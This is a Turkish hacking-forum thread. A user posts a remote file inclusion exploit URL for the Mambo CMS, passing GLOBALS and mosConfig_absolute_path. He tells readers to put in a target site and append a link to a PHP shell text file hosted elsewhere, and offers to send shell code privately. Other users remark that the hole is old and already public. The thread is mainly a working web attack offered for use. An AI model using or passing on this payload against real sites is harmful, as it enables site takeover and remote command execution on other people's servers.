Mambo Remote IncudLe FiLe

Phara0h

Banned
Reaction score
0
Merhaba ArkadasLar Bu Kod Herkeste Bulunmaz... Hatta C0gu Team'de BuLunmaz... :) oLay SoyLe : asagidaki HackheLL.Com Yerine Mambo Sitesini Yazin Ve Sonuna Php ListPath'in Txt HaLine Link Verin... S0runuz Varsa S0rabiLirsiniz :)

Kod:
http://www.hackhell.com/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

Phara0h // HackheLL.Com

biladerim ne işe yarar bu kod.....

Hemen SoyLeyeyim Ornegin Ben Php SheLL CaListirdim.. aLLataki Resime Benzer Bir ekran Cikar İstedigini Yaparsin... Eger İstersen Php-SheLL'in KodLarini PM AtabiLirim

option yerine bir şey yazacak mıyız..

Hayir OnunLa Ugrasmayin Kodun Sonuna Bir Php ListPath'in Txt Kodunu Yazin...

Bu acik tüm security sitelerinde yayinlandı. :]] lol Bunun 0day oldugumunu söylemeye calisiyorsun :] ayLar once cikan bir stringi yeni diye göstermek ne menem bir durum anLamadim.. :] biLdigimiz RFI :]

Serqan' Alıntı:
Bu acik tüm security sitelerinde yayinlandı. :]] lol Bunun 0day oldugumunu söylemeye calisiyorsun :] ayLar once cikan bir stringi yeni diye göstermek ne menem bir durum anLamadim.. :] biLdigimiz RFI :]

herşeye bi kulp takıcanıza,sizde bişiler paylaşın..

Serqan' Alıntı:

Ben Yeni Demiy0rum ki Bircok Site ve Team'de BuLunmaz Diy0rum.. GozunLe Oku Istersen ;)

Geri